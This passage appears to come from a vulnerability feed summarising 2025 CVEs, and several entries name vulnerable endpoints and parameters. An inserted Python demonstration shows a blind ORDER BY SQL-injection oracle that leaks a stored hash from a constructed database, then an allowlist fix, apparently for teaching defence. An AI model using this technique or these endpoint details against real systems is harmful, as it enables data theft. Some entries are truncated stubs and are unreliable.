Privilege escalation vulnerability in SAP GRC that allows authenticated non-administrative users to access and initiate transactions capable of modifying system credentials. This critical flaw compromises confidentiality, integrity, and availability across the application, with a CVSS score of 8.8 indicating high severity. The vulnerability requires valid credentials to exploit but has no privilege requirements beyond basic user access, making it a significant risk in environments with broad GRC user bases.
Sap
Information Disclosure
-
CVE-2025-42977
HIGH
CVSS 7.6
SAP NetWeaver Visual Composer contains a directory traversal vulnerability (CWE-22) that allows high-privileged users to bypass path validation controls and read or modify arbitrary files on the system. The vulnerability affects SAP NetWeaver Visual Composer across supported versions and has a CVSS score of 7.6 due to high confidentiality impact and a network-accessible attack vector, though exploitation requires high privileges (PR:H). Exploitation likelihood and KEV/POC status cannot be confirmed from available data, but the high-privilege prerequisite significantly reduces real-world exploitability compared to what the base CVSS score suggests.
Sap
Path Traversal
Information Disclosure
-
CVE-2025-40662
HIGH
CVSS 7.5
CVE-2025-40662 is an absolute path disclosure vulnerability in DM Corporative CMS that exposes sensitive filesystem information when an attacker requests non-existent files within the webroot/file directory. This high-severity information disclosure (CVSS 7.5) affects DM Corporative CMS users and allows unauthenticated remote attackers to enumerate and discover the absolute filesystem paths of the application, which typically precedes further exploitation. The vulnerability has not been confirmed as actively exploited in the wild (KEV status unknown from provided data), but represents a significant reconnaissance vector with minimal attack complexity.
Information Disclosure
Path Traversal
Dm Corporative Cms
-
CVE-2025-40661
HIGH
CVSS 7.5
CVE-2025-40661 is an Insecure Direct Object Reference (IDOR) vulnerability in DM Corporative CMS that allows unauthenticated attackers to bypass authentication and access the private administrative area by manipulating the 'option' parameter (values 0, 1, or 2) in the /administer/selectionnode/selection.asp endpoint. The vulnerability has a CVSS score of 7.5 (High) with high confidentiality impact, indicating potential exposure of sensitive administrative data. No KEV status, EPSS score, or confirmed POC availability was provided in the source data, limiting definitive assessment of active exploitation.
Information Disclosure
Dm Corporative Cms
-
CVE-2025-40660
HIGH
CVSS 7.5
CVE-2025-40660 is a security vulnerability (CVSS 7.5) that allows an attacker. High-severity vulnerability requiring prompt remediation.
Information Disclosure
Dm Corporative Cms
-
CVE-2025-40659
HIGH
CVSS 7.5
CVE-2025-40659 is an Insecure Direct Object Reference (IDOR) vulnerability in DM Corporative CMS that allows unauthenticated attackers to bypass access controls and view the private administrative area by manipulating the 'option' parameter (values 0, 1, or 2) in the /administer/selectionnode/framesSelectionNetworks.asp endpoint. This high-severity vulnerability (CVSS 7.5) has a high confidentiality impact but does not enable data modification or service disruption. No active exploitation in the wild (KEV) or public proof-of-concept has been confirmed in available intelligence, but the vulnerability's simplicity and unauthenticated attack vector make it a significant priority for affected organizations.
Information Disclosure
Dm Corporative Cms
-
CVE-2025-40658
HIGH
CVSS 7.5
CVE-2025-40658 is an Insecure Direct Object Reference (IDOR) vulnerability in DM Corporative CMS that allows unauthenticated remote attackers to bypass access controls and view private administrative areas by manipulating the 'option' parameter (values 0, 1, or 2) in the /administer/selectionnode/framesSelection.asp endpoint. The vulnerability has a CVSS 3.1 score of 7.5 (High) with high confidentiality impact, no privilege requirement, and no user interaction needed, making it a significant authentication bypass risk for affected CMS installations.
Information Disclosure
Dm Corporative Cms
-
CVE-2025-40591
HIGH
CVSS 7.7
A security vulnerability (CVSS 7.7). High-severity vulnerability requiring prompt remediation.
Command Injection
Siemens
RCE
Information Disclosure
Privilege Escalation
-
CVE-2025-37100
HIGH
CVSS 7.7
Path traversal vulnerability in HPE Aruba Networking Private 5G Core APIs that allows authenticated users to iteratively navigate the filesystem and download sensitive system files. The vulnerability affects the Private 5G Core platform with a CVSS score of 7.7 (high severity) due to confidentiality impact across system boundaries. While requiring low-privilege authentication and network access, successful exploitation directly exposes protected system files containing sensitive configuration and credential data.
Path Traversal
Information Disclosure
-
CVE-2025-36575
HIGH
CVSS 7.5
An information disclosure vulnerability (exposure of sensitive information) with a CVSS score of 7.5. High-severity vulnerability requiring prompt remediation.
Information Disclosure
Dell
Wyse Management Suite
-
CVE-2025-36574
HIGH
CVSS 8.2
Dell Wyse Management Suite versions prior to 5.2 contain an Absolute Path Traversal vulnerability (CWE-36) that allows unauthenticated remote attackers to read arbitrary files and gain unauthorized access without user interaction. The CVSS 8.2 score reflects high confidentiality impact and low integrity impact, with network-based attack vector requiring no privileges or interaction. No KEV/CISA active exploitation data, EPSS score, or public POC is currently confirmed in available intelligence, but the unauthenticated remote nature and path traversal primitive warrant immediate patching.
Authentication Bypass
Information Disclosure
Path Traversal
Dell
Wyse Management Suite
-
CVE-2025-35940
HIGH
CVSS 8.1
Critical authentication bypass vulnerability in ArchiverSpaApi ASP.NET applications caused by hard-coded JWT signing keys. An unauthenticated remote attacker can forge valid JWT tokens to bypass authentication and gain unauthorized access to protected API endpoints, potentially leading to data exfiltration, modification, or denial of service. The CVSS 8.1 score reflects high confidentiality, integrity, and availability impact, though the attack complexity is rated as high, suggesting some technical prerequisites.
Authentication Bypass
Dotnet
Information Disclosure
-
CVE-2025-33112
HIGH
CVSS 8.4
Local privilege escalation vulnerability in the Perl implementation shipped with IBM AIX 7.3 and IBM VIOS 4.1.1 that allows non-privileged local users to execute arbitrary code through improper pathname neutralization (path traversal). With a CVSS score of 8.4 and no authentication requirement, this represents a critical risk for AIX environments where local user access exists. Confirmed active exploitation or public proof-of-concept availability would significantly elevate the real-world risk.
RCE
IBM
Privilege Escalation
Path Traversal
Aix
-
CVE-2025-33075
HIGH
CVSS 7.8
Privilege escalation vulnerability in Windows Installer that exploits improper symlink/junction handling (CWE-59: link following) to allow an authorized local attacker to elevate privileges without user interaction. With a CVSS score of 7.8 and CVSS vector indicating local attack vector with low complexity and no user interaction required, this vulnerability affects Windows Installer across multiple versions. Real-world risk depends on KEV/CISA status and EPSS probability, which should be cross-referenced against active exploitation reports and POC availability.
Microsoft
Windows
Privilege Escalation
Windows Server 2019
Windows Server 2025
-
CVE-2025-33071
HIGH
CVSS 8.1
Use-after-free memory corruption vulnerability in Windows KDC Proxy Service (KPSSVC) that allows unauthenticated network attackers to execute arbitrary code with high impact on confidentiality, integrity, and availability. The vulnerability affects Windows systems running the Kerberos KDC Proxy Service and represents a critical remote code execution risk in Active Directory environments. While specific KEV/POC status and EPSS scores are not provided in the source data, the network attack vector combined with high CVSS 8.1 score and remote code execution capability indicates this is a significant priority for organizations relying on Windows authentication infrastructure.
Use After Free
Microsoft
Windows
RCE
Windows Server 2022 23h2
-
CVE-2025-33070
HIGH
CVSS 8.1
Use-of-uninitialized-resource vulnerability in Windows Netlogon that allows unauthenticated network attackers to achieve privilege escalation through a complex exploitation path. The vulnerability affects Windows systems running Netlogon services and enables remote code execution with high impact on confidentiality, integrity, and availability. Given the network-based attack vector and lack of authentication requirements, this represents a significant threat to networked Windows environments, though exploitation requires specific conditions (high attack complexity).
Microsoft
Authentication Bypass
Windows 11 24h2
Windows 10 1607
Windows 10 1809
-
CVE-2025-33067
HIGH
CVSS 8.4
Local privilege escalation vulnerability in the Windows Kernel stemming from improper privilege management (CWE-269), allowing an unauthenticated attacker with local system access to escalate privileges without user interaction. This affects multiple Windows versions and has a CVSS 8.4 severity rating indicating high confidentiality, integrity, and availability impact. The vulnerability's low attack complexity (AC:L) and lack of privilege requirements (PR:N) indicate it is relatively straightforward to exploit for any local attacker.
Microsoft
Privilege Escalation
Windows
Windows 10 22h2
Windows 10 1809
-
CVE-2025-33066
HIGH
CVSS 8.8
Heap-based buffer overflow vulnerability in Windows Routing and Remote Access Service (RRAS) that allows unauthenticated remote attackers to execute arbitrary code over the network with user interaction. This is a critical network-accessible vulnerability affecting Windows systems running RRAS; successful exploitation grants the attacker complete system compromise with high confidentiality, integrity, and availability impact. The CVSS 8.8 score reflects the severity, though real-world exploitation probability and active KEV status would determine if this is actively weaponized.
Microsoft
Buffer Overflow
Windows 11 23h2
Windows 10 1809
Windows Server 2019
-
CVE-2025-33064
HIGH
CVSS 8.8
Heap-based buffer overflow vulnerability in Windows Routing and Remote Access Service (RRAS) that allows authenticated network attackers to execute arbitrary code with high impact on confidentiality, integrity, and availability. This is a critical vulnerability affecting RRAS implementations across Windows Server and client operating systems; exploitation requires valid credentials but no user interaction, making it suitable for lateral movement and privilege escalation scenarios within compromised networks.
Microsoft
Buffer Overflow
Windows Server 2025
Windows 11 23h2
Windows 10 1507
-
CVE-2025-33056
HIGH
CVSS 7.5
Network-accessible denial-of-service vulnerability in Microsoft's Local Security Authority Server (lsasrv) caused by improper access control (CWE-284). An unauthenticated remote attacker can exploit this with low complexity to render the LSA service unavailable, affecting authentication and security policy enforcement on affected Windows systems. The CVSS 7.5 severity reflects the high availability impact; however, real-world risk depends on EPSS score, KEV candidacy status, and active exploitation data not provided in the source materials.
Microsoft
Windows
Denial Of Service
Windows Server 2022
Windows 11 22h2
-
CVE-2025-33050
HIGH
CVSS 7.5
Protection mechanism failure in Windows DHCP Server that enables network-based denial-of-service attacks without requiring authentication or user interaction. An attacker can remotely exploit this vulnerability to render DHCP services unavailable, disrupting network connectivity for affected systems. The high CVSS score of 7.5 and network attack vector indicate significant availability impact, though no confidentiality or integrity compromise occurs.
Microsoft
Windows
Dhcp
Denial Of Service
Windows Server 2025
-
CVE-2025-32725
HIGH
CVSS 7.5
Network-accessible denial-of-service vulnerability in Windows DHCP Server caused by a protection mechanism failure (CWE-693), allowing unauthenticated attackers to exhaust server availability without requiring authentication or user interaction. The vulnerability affects Windows DHCP Server implementations across multiple versions and has a CVSS severity of 7.5 (High). While the description does not explicitly reference KEV inclusion, active exploitation status, or EPSS data, the low attack complexity (AC:L) and network accessibility (AV:N) combined with no authentication requirements indicate this represents a credible denial-of-service threat to DHCP infrastructure.
Microsoft
Windows
Dhcp
Denial Of Service
Windows Server 2025
-
CVE-2025-32721
HIGH
CVSS 7.3
Privilege escalation vulnerability in Windows Recovery Driver caused by improper symlink/hardlink resolution (CWE-59: link following) that allows an authenticated local attacker to elevate privileges to SYSTEM level. The vulnerability requires user interaction and local code execution capability but provides complete system compromise once exploited. With a CVSS score of 7.3 and local attack vector, this poses significant risk to multi-user Windows systems, particularly in enterprise environments where standard users have local access.
Microsoft
Windows
Privilege Escalation
Windows Server 2025
Windows 11 23h2
-
CVE-2025-32718
HIGH
CVSS 7.8
CVE-2025-32718 is an integer overflow vulnerability in Windows SMB that allows a locally authenticated attacker to achieve privilege escalation with high impact to confidentiality, integrity, and availability. The vulnerability affects Windows operating systems' SMB implementation and has a CVSS score of 7.8 (High) with low attack complexity, making it a significant local privilege escalation risk for multi-user systems and domain environments.
Microsoft
Windows
Privilege Escalation
Integer Overflow
Windows Server 2012
-
CVE-2025-32716
HIGH
CVSS 7.8
CVE-2025-32716 is an out-of-bounds read vulnerability in Windows Media that allows an authenticated local attacker to achieve privilege escalation on affected systems. The vulnerability has a CVSS score of 7.8 (high severity) due to its impact on confidentiality, integrity, and availability. Without confirmation of KEV status, active exploitation, or public POC availability from the provided data, the real-world risk assessment requires evaluation against the moderate attack complexity (local access required, authenticated user needed).
Microsoft
Windows
Privilege Escalation
Windows Server 2022
Windows Server 2019
-
CVE-2025-32714
HIGH
CVSS 7.8
Local privilege escalation vulnerability in Windows Installer caused by improper access control (CWE-284) that allows an authorized local attacker to elevate privileges without user interaction. The vulnerability affects Windows Installer components across multiple Windows versions and has a CVSS score of 7.8 (High severity). Without confirmation of KEV status or active exploitation data, the high CVSS vector (Low attack complexity, Low privileges required) indicates this represents a significant risk to systems where local user accounts exist.
Microsoft
Windows
Privilege Escalation
Windows 11 24h2
Windows Server 2022 23h2
-
CVE-2025-32713
HIGH
CVSS 7.8
Heap-based buffer overflow vulnerability in the Windows Common Log File System (CLFS) Driver that allows local authenticated attackers to achieve privilege escalation with high confidence of exploitation. The vulnerability affects Windows systems with the CLFS driver enabled and requires local access with standard user privileges; successful exploitation grants complete system compromise including code execution at SYSTEM level. While no public POC is confirmed in available intelligence, the straightforward nature of heap overflows and the high CVSS score (7.8) with low attack complexity indicate active research interest and potential for rapid weaponization.
Microsoft
Buffer Overflow
Windows
Privilege Escalation
Windows 10 1809
-
CVE-2025-32712
HIGH
CVSS 7.8
Use-after-free vulnerability in the Windows Win32K graphics subsystem (GRFX component) that allows a locally authenticated attacker to achieve arbitrary code execution and privilege escalation without user interaction. The vulnerability affects Windows systems with affected Win32K versions and carries a CVSS score of 7.8 (high severity). Given the local attack vector requirement and the need for prior authentication, real-world exploitation is constrained to insider threats or attackers who have already achieved initial access; however, the severity of the impact (complete system compromise) makes this a critical priority for patching.
Use After Free
Microsoft
Windows
Privilege Escalation
Windows Server 2022 23h2
-
CVE-2025-32710
HIGH
CVSS 8.1
Use-after-free vulnerability in Windows Remote Desktop Services (RDS) that allows unauthenticated network attackers to execute arbitrary code with high complexity requirements. The vulnerability affects Windows systems running RDS and represents a critical remote code execution risk; exploitation requires network access but no user interaction, though attack complexity is rated as high. If this CVE has been added to CISA's Known Exploited Vulnerabilities (KEV) catalog, it indicates active exploitation in the wild and should be treated as an immediate priority.
Microsoft
Windows
Remote Code Execution
Use After Free
Windows Server 2025
-
CVE-2025-31104
HIGH
CVSS 7.2
FortiADC versions 6.1 through 7.6.1 contain an OS command injection vulnerability (CWE-78) that allows authenticated attackers with high privileges to execute arbitrary code through crafted HTTP requests. The vulnerability affects multiple product versions across several release branches, with a CVSS score of 7.2 indicating high severity. While the attack requires authentication and high-level privileges, successful exploitation results in complete system compromise with confidentiality, integrity, and availability impact.
Command Injection
Fortinet
Fortigate
RCE
Authentication Bypass
-
CVE-2025-30327
HIGH
CVSS 7.8
CVE-2025-30327 is an integer overflow vulnerability in Adobe InCopy that enables arbitrary code execution with the privileges of the current user. Versions 20.2, 19.5.3 and earlier are affected; exploitation requires a user to open a malicious file, making it a file-based attack vector with moderate attack complexity. The vulnerability has a CVSS score of 7.8 (high severity) with complete impact on confidentiality, integrity, and availability, though real-world exploitation depends on user interaction and file delivery success.
RCE
Integer Overflow
Adobe
Incopy
-
CVE-2025-30317
HIGH
CVSS 7.8
Heap-based buffer overflow vulnerability in Adobe InDesign Desktop that allows arbitrary code execution when a user opens a malicious file. Affected versions include InDesign ID20.2, ID19.5.3, and earlier. The vulnerability requires user interaction but presents high severity risk (CVSS 7.8) with potential for complete system compromise in the context of the affected user's privileges.
Buffer Overflow
RCE
Adobe
Indesign
-
CVE-2025-30145
HIGH
CVSS 7.5
Denial-of-service vulnerability in GeoServer that allows unauthenticated remote attackers to execute malicious Jiffle scripts, causing infinite loops and service unavailability. Affected versions are GeoServer prior to 2.25.7, 2.26.3, and 2.27.0. The vulnerability is triggered through WMS dynamic styling or WPS processes and requires no authentication or user interaction, making it easily exploitable by remote attackers.
Denial Of Service
Geoserver
-
CVE-2025-29828
HIGH
CVSS 8.1
Memory management vulnerability in Windows Cryptographic Services where memory is not properly released after its effective lifetime, enabling unauthenticated remote code execution. The vulnerability affects Windows cryptographic components and allows network-based attackers to execute arbitrary code with high complexity requirements. While the CVSS score of 8.1 indicates significant severity, exploitation requires specific conditions (high attack complexity), and current status regarding KEV listing, EPSS score, and public POC availability is unknown pending official Microsoft advisory release.
Microsoft
Windows
RCE
Memory Corruption
Windows 11 24h2
-
CVE-2025-27819
HIGH
CVSS 7.5
A remote code execution vulnerability (CVSS 7.5). High-severity vulnerability requiring prompt remediation.
Denial Of Service
Apache
Java
RCE
Authentication Bypass
-
CVE-2025-27818
HIGH
CVSS 8.8
A remote code execution vulnerability (CVSS 8.8). High-severity vulnerability requiring prompt remediation.
Deserialization
Java
Apache
Ldap
RCE
-
CVE-2025-26521
HIGH
CVSS 8.1
CVE-2025-26521 is a security vulnerability (CVSS 8.1). High-severity vulnerability requiring prompt remediation.
Apache
Information Disclosure
Kubernetes
Privilege Escalation
Cloudstack
-
CVE-2025-26395
HIGH
CVSS 7.1
Stored/reflected cross-site scripting (XSS) vulnerability in SolarWinds Observability Self-Hosted caused by insufficient input sanitization in URL parameters. The vulnerability affects authenticated administrators and requires user interaction to exploit, allowing attackers with admin credentials to inject malicious scripts that execute in victim browsers with network-scoped impact (C:H, I:L, A:L). There is no indication of active exploitation in the wild (KEV status unknown) or public proof-of-concept availability based on available data.
XSS
Authentication Bypass
Observability Self Hosted
-
CVE-2025-23192
HIGH
CVSS 8.2
Stored Cross-Site Scripting (XSS) vulnerability in SAP BusinessObjects BI Workspace that allows unauthenticated attackers to inject and persist malicious JavaScript code within workspaces. When authenticated users access compromised workspaces, the malicious script executes in their browser context, potentially exposing sensitive session tokens, cookies, and user data. The vulnerability has a CVSS score of 8.2 (High) with significant confidentiality impact; while KEV/EPSS data and active exploitation status are not provided in available intelligence, the attack requires user interaction and authentication context, moderating real-world severity despite the high CVSS rating.
Sap
XSS
Information Disclosure
Businessobjects Business Intelligence
-
CVE-2025-22463
HIGH
CVSS 7.3
Cryptographic weakness in Ivanti Workspace Control versions before 10.19.10.0 where a hardcoded encryption key is embedded in the application, allowing authenticated local attackers to decrypt stored environment passwords. This vulnerability enables privilege escalation and lateral movement within affected environments. The CVSS 7.3 score reflects high confidentiality and integrity impact, though exploitation requires local access and user authentication; KEV and active exploitation status are not confirmed in available intelligence.
Information Disclosure
Ivanti
Privilege Escalation
Workspace Control
-
CVE-2025-22455
HIGH
CVSS 8.8
Cryptographic weakness in Ivanti Workspace Control prior to version 10.19.0.0 that uses a hardcoded encryption key to protect SQL database credentials stored locally. A local authenticated attacker with user-level privileges can exploit this to decrypt and extract stored SQL credentials without elevated permissions, potentially leading to lateral movement and data exfiltration. The CVSS 8.8 score reflects high severity due to confidentiality and integrity impacts across system boundaries, though exploitation requires local access and valid authentication.
Information Disclosure
Ivanti
Authentication Bypass
Workspace Control
-
CVE-2025-5985
HIGH
CVSS 7.3
Improper authentication vulnerability (CVSS 7.3, High) in code-projects School Fees Payment System version 1.0 that allows unauthenticated remote attackers to bypass authentication controls and gain unauthorized access to the system. The issue has been publicly disclosed with proof-of-concept exploitation details, so exploitation against exposed deployments is likely.
Authentication Bypass
School Fees Payment System
-
CVE-2025-5980
HIGH
CVSS 7.3
SQL injection vulnerability (CVSS 7.3, High) in code-projects Restaurant Order System 1.0 via the 'tabidNoti' parameter of /order.php. Remote unauthenticated attackers can execute arbitrary SQL queries, leading to unauthorized data access, modification, or deletion. The vulnerability has been publicly disclosed with exploit code available, making active exploitation likely.
PHP
SQLi
Restaurant Order System
-
CVE-2025-5979
HIGH
CVSS 7.3
SQL injection vulnerability (CVSS 7.3, High) in code-projects School Fees Payment System version 1.0 via the ID parameter of /branch.php, allowing remote unauthenticated attackers to execute arbitrary SQL commands. The vulnerability has been publicly disclosed with a proof-of-concept available; the unauthenticated, network-accessible attack vector combined with public exploit disclosure indicates active exploitation risk for every unpatched deployment of the vulnerable version.
PHP
SQLi
School Fees Payment System
-
CVE-2025-5978
HIGH
CVSS 8.8
Stack-based buffer overflow (CVSS 8.8, High) in Tenda FH1202 firmware version 1.2.0.14 in the fromVirtualSer function behind the /goform/VirtualSer endpoint, triggered by an overlong 'page' parameter that is copied without a length check. An authenticated attacker can exploit this remotely to achieve arbitrary code execution with full compromise of confidentiality, integrity, and availability. Public disclosure and proof-of-concept availability significantly elevate real-world exploitation risk.
Buffer Overflow
Remote Code Execution
Fh1202 Firmware
Tenda
-
CVE-2025-5977
HIGH
CVSS 7.3
SQL injection vulnerability (CVSS 7.3, High) in code-projects School Fees Payment System version 1.0 in /datatable.php, where the sSortDir_0 sort-direction parameter is used without validation. An unauthenticated remote attacker can exploit this to execute arbitrary SQL queries, compromising the confidentiality, integrity, and availability of the underlying database. The vulnerability has been publicly disclosed with exploit code available, indicating active exploitation risk.
PHP
SQLi
Remote Code Execution
School Fees Payment System
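The sSortDir_0 entry above is the classic server-side DataTables sort-parameter injection: a sort column or direction is pasted into ORDER BY, and because identifiers and keywords cannot be bound as prepared-statement parameters, escaping does not help. The following added example (not code from the vulnerable application or from this page) shows the pattern against a constructed in-memory SQLite database: a blind oracle that leaks a stored hash one character at a time purely by observing which row comes back first, and the allowlist-based builder that closes the hole. The table names, rows, and the admin hash value are all constructed for the demonstration.

```python
"""Sort-parameter SQL injection: vulnerable ORDER BY concatenation next to an
allowlisted builder, run against a constructed in-memory SQLite database."""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample data standing in for a fee-payment app's tables.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE fees (id INTEGER PRIMARY KEY, student TEXT, amount INTEGER)")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO fees VALUES (?, ?, ?)",
                     [(1, "alice", 300), (2, "bob", 150), (3, "carol", 500)])
    conn.execute("INSERT INTO users VALUES ('admin', 'hash-of-admin-password')")
    return conn


def vulnerable_query(conn, sort_col: str, sort_dir: str):
    # The bug pattern: the sort-direction parameter is pasted into ORDER BY unchanged.
    sql = f"SELECT id, student, amount FROM fees ORDER BY {sort_col} {sort_dir}"
    return conn.execute(sql).fetchall()


def oracle(conn, guess: str) -> bool:
    # Blind oracle through the sort parameter: the CASE inside OFFSET skips the
    # first row unless the guessed prefix of the admin hash is right, so the
    # attacker reads the answer from which row is returned first.
    payload = (
        "ASC LIMIT 1 OFFSET (CASE WHEN (SELECT substr(password_hash, 1, %d) "
        "FROM users WHERE username = 'admin') = '%s' THEN 0 ELSE 1 END)"
        % (len(guess), guess)
    )
    rows = vulnerable_query(conn, "id", payload)
    return rows[0][0] == 1


def leak_prefix(conn, length: int, alphabet: str = "abcdefghijklmnopqrstuvwxyz-") -> str:
    # Character-by-character extraction driven only by the oracle above.
    prefix = ""
    for _ in range(length):
        for ch in alphabet:
            if oracle(conn, prefix + ch):
                prefix += ch
                break
        else:
            break  # no candidate matched; stop instead of looping forever
    return prefix


ALLOWED_COLUMNS = {"id", "student", "amount"}
ALLOWED_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def hardened_query(conn, sort_col: str, sort_dir: str):
    # Identifiers and keywords cannot be bound as parameters, so the request
    # values are mapped onto fixed, known-good SQL fragments and nothing else.
    if sort_col not in ALLOWED_COLUMNS:
        raise ValueError(f"unsupported sort column: {sort_col!r}")
    direction = ALLOWED_DIRECTIONS.get(sort_dir.lower())
    if direction is None:
        raise ValueError(f"unsupported sort direction: {sort_dir!r}")
    sql = f"SELECT id, student, amount FROM fees ORDER BY {sort_col} {direction}"
    return conn.execute(sql).fetchall()


def hardened_rejects(conn, sort_col: str, sort_dir: str) -> bool:
    # True when the allowlisted builder refuses the supplied sort values.
    try:
        hardened_query(conn, sort_col, sort_dir)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("leaked via sort parameter:", leak_prefix(db, 7))
    print("hardened, amount desc:", hardened_query(db, "amount", "desc"))
    print("hardened rejects injection:", hardened_rejects(db, "id", "ASC LIMIT 1 OFFSET 1"))
```

The payload uses LIMIT/OFFSET after ORDER BY because that is what the direction slot accepts in SQLite; on MySQL-backed PHP apps like the one in the entry the same slot accepts comparable expressions. The fix is not escaping but refusing anything outside the two literal directions and the known column names.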
-
CVE-2025-5969
HIGH
CVSS 8.8
Stack-based buffer overflow (CVSS 8.8, High) in D-Link DIR-632 firmware version FW103B08 in the HTTP POST request handler for the /biurl_grou component. An authenticated attacker can remotely exploit this vulnerability to achieve arbitrary code execution with high impact on confidentiality, integrity, and availability. Public exploit code has been disclosed and the product is no longer maintained by D-Link, so no vendor fix should be expected; isolation or replacement is the realistic mitigation.
Buffer Overflow
D-Link
Remote Code Execution
Dir 632 Firmware
-
CVE-2025-5952
HIGH
CVSS 7.3
OS command injection vulnerability (CVSS 7.3, High) in Zend.To versions up to 6.10-6 Beta, where the 'file_1' parameter handled by NSSDropoff.php reaches an exec call without sanitization, allowing remote unauthenticated attackers to execute arbitrary system commands with the privileges of the web application. The vulnerability has been publicly disclosed with working exploits available, making active exploitation probable. The affected branch is an older release that has since been superseded; deployments should be upgraded to a current version.
PHP
Command Injection
RCE
-
CVE-2025-5943
HIGH
CVSS 8.8
MicroDicom DICOM Viewer contains an out-of-bounds write vulnerability (CWE-787) that allows remote attackers to execute arbitrary code with high confidentiality and integrity impact (CVSS 8.8). Exploitation requires user interaction (visiting a malicious website or opening a crafted DICOM file), which is a realistic precondition in clinical workflows. No active exploitation in the wild (KEV) or public POC has been confirmed at this time, but the network-accessible attack vector and low complexity suggest meaningful real-world risk.
Buffer Overflow
RCE
-
CVE-2025-5934
HIGH
CVSS 8.8
Stack-based buffer overflow (CVSS 8.8, High) in Netgear EX3700 wireless extenders up to version 1.0.0.88, in the sub_41619C function of the /mtd file. An authenticated attacker can remotely exploit this vulnerability to achieve complete compromise of the device (confidentiality, integrity, and availability). Public exploit code is available. The product line is no longer supported by Netgear, so confirm whether firmware 1.0.0.98 or later is offered for your units; where no fixed build is available, restrict management access or replace the device.
Buffer Overflow
Netgear
Remote Code Execution
Ex3700 Firmware
-
CVE-2025-5913
HIGH
CVSS 7.3
SQL injection vulnerability (CVSS 7.3, High) in Vehicle Record Management System. A public proof-of-concept is available, which raises the likelihood of exploitation against exposed deployments.
PHP
SQLi
Vehicle Record Management System
-
CVE-2025-5912
HIGH
CVSS 8.8
Stack-based buffer overflow (CVSS 8.8, High) in D-Link DIR-632 firmware version FW103B08 in the do_file function of the HTTP POST request handler. An authenticated remote attacker can exploit this vulnerability to achieve arbitrary code execution with full system compromise (confidentiality, integrity, and availability impact). Public exploit code is available and the affected product is end-of-life with no vendor support.
Buffer Overflow
D-Link
RCE
Dir 632 Firmware
-
CVE-2025-5911
HIGH
CVSS 8.8
Buffer overflow vulnerability in TOTOLINK EX1200T firmware (CVSS 8.8, High). A public proof-of-concept is available.
Buffer Overflow
RCE
Ex1200t Firmware
TOTOLINK
-
CVE-2025-5910
HIGH
CVSS 8.8
Buffer overflow vulnerability (CVSS 8.8, High) in TOTOLINK EX1200T routers (firmware versions up to 4.1.2cu.5232_B20210713) in the HTTP POST request handler for the /boafrm/formWsc endpoint. An authenticated remote attacker can exploit this vulnerability to achieve arbitrary code execution with complete system compromise (confidentiality, integrity, and availability). Public exploit code is available; active exploitation in the wild has not been confirmed.
Buffer Overflow
RCE
Ex1200t Firmware
TOTOLINK
-
CVE-2025-5909
HIGH
CVSS 8.8
Buffer overflow vulnerability (CVSS 8.8, High) in TOTOLINK EX1200T wireless routers (up to firmware version 4.1.2cu.5232_B20210713) in the HTTP POST request handler for the /boafrm/formReflashClientTbl endpoint. An authenticated attacker can remotely exploit this vulnerability to achieve complete system compromise (confidentiality, integrity, and availability). Public exploit code has been disclosed, so a working proof-of-concept is available to attackers.
Buffer Overflow
RCE
Ex1200t Firmware
TOTOLINK
-
CVE-2025-5908
HIGH
CVSS 8.8
Buffer overflow vulnerability (CVSS 8.8, High) in TOTOLINK EX1200T wireless routers (up to version 4.1.2cu.5232_B20210713) in the HTTP POST request handler for the /boafrm/formIpQoS endpoint. An authenticated remote attacker can exploit this vulnerability to achieve arbitrary code execution with complete system compromise (confidentiality, integrity, and availability). The exploit has been publicly disclosed and proof-of-concept code is available, making this a high-priority issue for affected deployments.
Buffer Overflow
RCE
Ex1200t Firmware
TOTOLINK
-
CVE-2025-5907
HIGH
CVSS 8.8
Buffer overflow vulnerability (CVSS 8.8, High) in TOTOLINK EX1200T routers (firmware versions up to 4.1.2cu.5232_B20210713) in the HTTP POST request handler for the /boafrm/formFilter endpoint. An authenticated remote attacker can exploit this vulnerability to achieve remote code execution with full system compromise (confidentiality, integrity, and availability impact). The vulnerability has been publicly disclosed with exploit code available, creating immediate risk for deployed devices.
Buffer Overflow
RCE
Ex1200t Firmware
TOTOLINK
-
CVE-2025-5906
HIGH
CVSS 7.3
Authentication bypass vulnerability (CVSS 7.3, High) in code-projects Laundry System 1.0 affecting the /data/ endpoint, allowing unauthenticated remote attackers to read and modify data and potentially disrupt availability. The vulnerability has been publicly disclosed with exploit code available; the network attack vector (AV:N), lack of privilege requirement (PR:N), and absence of user interaction (UI:N) make it immediately exploitable against exposed production deployments. Active exploitation is likely given public POC availability and the ease of attack execution.
Authentication Bypass
Laundry System
-
CVE-2025-5905
HIGH
CVSS 8.8
Buffer overflow vulnerability (CVSS 8.8, High) in TOTOLINK T10 firmware version 4.1.8cu.5207 in the WiFi repeater configuration function. An authenticated remote attacker can exploit this vulnerability by sending a POST request to /cgi-bin/cstecgi.cgi with an oversized Password parameter, achieving complete compromise of the device including arbitrary code execution. Public disclosure and proof-of-concept availability significantly elevate real-world risk despite the requirement for authenticated access.
Buffer Overflow
RCE
T10 Firmware
TOTOLINK
-
CVE-2025-5904
HIGH
CVSS 8.8
Buffer overflow vulnerability (CVSS 8.8, High) in TOTOLINK T10 firmware version 4.1.8cu.5207 in the setWiFiMeshName function of the POST request handler (/cgi-bin/cstecgi.cgi). An authenticated remote attacker can overflow the device_name parameter to achieve arbitrary code execution with complete system compromise (confidentiality, integrity, and availability impact). Public exploit code is available, elevating real-world risk despite the requirement for authenticated access.
Buffer Overflow
RCE
T10 Firmware
TOTOLINK
-
CVE-2025-5903
HIGH
CVSS 8.8
Buffer overflow vulnerability (CVSS 8.8, High) in TOTOLINK T10 firmware version 4.1.8cu.5207 in the setWiFiAclRules function of the POST request handler (/cgi-bin/cstecgi.cgi). An authenticated attacker can remotely exploit this vulnerability by supplying an oversized 'desc' parameter to achieve code execution with full system compromise (confidentiality, integrity, and availability impact). A public proof-of-concept exists, elevating real-world exploitation risk despite requiring low-privilege authentication.
Buffer Overflow
RCE
T10 Firmware
TOTOLINK
-
CVE-2025-5740
HIGH
CVSS 7.2
